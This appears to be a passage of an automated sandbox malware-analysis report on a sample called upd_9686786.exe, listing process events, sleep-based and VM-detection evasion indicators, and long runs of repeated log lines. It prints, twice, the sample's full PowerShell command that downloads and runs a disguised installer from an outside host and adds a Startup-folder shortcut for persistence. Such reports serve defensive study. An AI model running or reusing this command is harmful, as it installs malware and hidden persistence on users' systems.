Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree).
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\Desktop\upd_9686786.exeCode function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeWindow / User API: threadDelayed 9708Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9909Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeWindow / User API: threadDelayed 9732Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9885
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008Thread sleep count: 291 > 30Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008Thread sleep time: -291000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008Thread sleep count: 9708 > 30Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008Thread sleep time: -9708000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep count: 9909 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516Thread sleep count: 267 > 30Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516Thread sleep time: -267000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516Thread sleep count: 9732 > 30Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516Thread sleep time: -9732000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep count: 9885 > 30
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: upd_9686786.exe, 00000000.00000002.34844256149.0000022A3F3A5000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844597358.0000012EDC445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: upd_9686786.exe, 00000000.00000002.34844538698.0000022A3F5D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.30008936621.0000016F75159000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844471247.0000012EDC1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeCode function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
